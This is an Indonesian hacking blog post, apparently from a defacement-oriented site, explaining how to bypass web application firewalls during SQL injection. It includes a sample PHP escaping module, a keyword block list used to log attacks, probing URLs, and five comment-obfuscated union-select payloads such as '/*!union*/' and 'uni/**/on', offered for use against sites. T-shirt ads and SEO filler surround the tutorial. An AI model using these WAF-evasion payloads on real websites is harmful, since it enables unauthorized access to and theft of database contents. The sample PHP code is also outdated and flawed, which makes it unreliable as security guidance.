Home DEFACE HACKING & CRACKING Software ByPass SQL Dengan WAF

Cyber News di


INDONESIA HACKER CYBER TEAM


WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** )
Ada yang mau lihat lihat koleksi atau membeli KAOS DAKWAH atau KAOS DISTRO bisa di lihat stok nya di GHIRAH
WAF itu kaya gimana sih ?
WAF itu ...
:v bingung mw jelasinnya, wkwkwkkwkw =))
tapi kalo untuk contohnya sih, waf itu modulenya kaya gini (yg aq tau :3 )

Code:
Anti MySQL Injection

$_GET = array_map('trim', $_GET);
$_POST = array_map('trim', $_POST);
$_COOKIE = array_map('trim', $_COOKIE);
$_REQUEST = array_map('trim', $_REQUEST);
if(get_magic_quotes_gpc()):
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
$_COOKIE = array_map('stripslashes', $_COOKIE);
$_REQUEST = array_map('stripslashes', $_REQUEST);
endif;
$_GET = array_map('mysql_real_escape_string', $_GET);
$_POST = array_map('mysql_real_escape_string', $_POST);
$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);
$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);

untuk contoh sampel module log nya ..
Code:
Log Error / Aktifitas WAF

$locatie = $_SERVER['REQUEST_URI'];
$array = Array();
$array[] = "mysql";
$array[] = "query";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "<script>";
$array[] = "</script>";
$array = Array();
$array[] = "mysql";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "INSERT";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "UPDATE";
$array[] = "COOKIE";
$array[] = "FILES";
$array[] = "POST";
$array[] = "REQUEST";
$array[] = "SERVER";
$array[] = "INSERT";
$array[] = "%40";
$array[] = "%20";
$array[] = "";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "WHERE";
$array[] = "VALUES";
$array[] = "SELECT";
$array[] = "FROM";
$array[] = "exit";
$array[] = "'";
$array[] = '"';
$array[] = ",";
$array[] = "`";
$array[] = "echo";
foreach($array As $posinject) {
if(eregi($posinject,$locatie)) {
$time = 'NOW()';
mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)
VALUES ('".ID."', '".$_SERVER[REMOTE_ADDR]."', '".$locatie."', '".$tijd."')") or die(mysql_error());
header("location: namafile.php");
exit();
}
}

yah seperti itulah contoh module script waf nya yang aq tau
kalo mumet baca kodenya :3
:v lanjutin dehh kalo blajar =))
nanggung kalo blajar setengah2
wkwkwkkwkwkwkwk :v
lanjut next step :3


Ciri2 Web Tersebut dilindungi WAF.

web tersebut dilindungi waf terlihat dari errornya
contoh :
Code:
Contoh 1 :
www.namawebsite.com/test.php?id=27'

Contoh 2 :
www.namawebsite.com/test.php?id=27 order by 1,2,3,4,5,6--

Contoh 3 :
www.namawebsite.com/test.php?id=27 union select all 1,2,3,4,5,6+from information_schema.tables+where table_schema=database()--
maka akan muncul 403 Forbidden, Not Acceptable, dsb ...


Bypass WAF

tehnik bypass WAF macem2, tergantung kreatifitas masing2 untuk membuat symbol2 atau syntak aneh2 yang berhubungan ama injeksi dari mysql

symbol2 yang digunakan dalam tehnik WAF tuh sih beragam
kaya :
Code:
/**/  , () , # , -- , +--+ , --+- , -- - , , %20 , / , // , <

yang paling sering dipake tuh yang /**/ , () , --

nahh, sekarang waktunya nerangin
( maap yah om2 tante2 ilmu copas dari google :3 xxixixixiiixiii :v )

contoh penggunaan waf :
Code:
Contoh 1
www.namawebsite.com/test.php?id=-27+/*!union*/+select+1,2,3--

Contoh 2
www.namawebsite.com/test.php?id=-27+/*!union*/+/*!select*/+1,2,3--

Contoh 3
www.namawebsite.com/test.php?id=-27/*union*/union/*select*/select+1,2,3/**

Contoh 4
www.namawebsite.com/test.php?id=-27/*uni Z on*/union/*sel Y ect*/select+1,2,3--

Contoh 5
www.namawebsite.com/test.php?id=-27+uni/**/on+se/**/lec/**/t+al/**/l+1,2,3--
LINK  WEB
BACA SELENGKAPNYA KAOS
BACA SELENGKAPNYA KAOS COUPLE
BACA SELENGKAPNYA KAOS DAKWAH
BACA SELENGKAPNYA KAOS NASEHAT
BACA SELENGKAPNYA KAOS CYBER
BACA SELENGKAPNYA KAOS MOTIVASI
BACA SELENGKAPNYA KAOS POLOS
BACA SELENGKAPNYA DESAIN KAOS
BACA SELENGKAPNYA MUKENA
BACA SELENGKAPNYA MUKENA BALI
BACA SELENGKAPNYA MUKENA KATUN JEPANG
BACA SELENGKAPNYA  MODEL MUKENA
BACA SELENGKAPNYA  BATIK

BACA SELENGKAPNYA MODEL BAJU BATIK

, ,
Share To:
Axact

BELAJAR SEO

SEO adalah singkatan dari "search engine optimization" (pengoptimalan mesin telusur) atau "search engine optimizer". Penggunaan jasa SEO adalah keputusan besar yang dapat meningkatkan peringkat situs Anda dan menghemat waktu, tapi juga berisiko tinggi terhadap situs dan reputasi.H.COM

DEFACE HACKING & CRACKING Software

Post A Comment:

0 comments:

Subscribe to: Post Comments (Atom)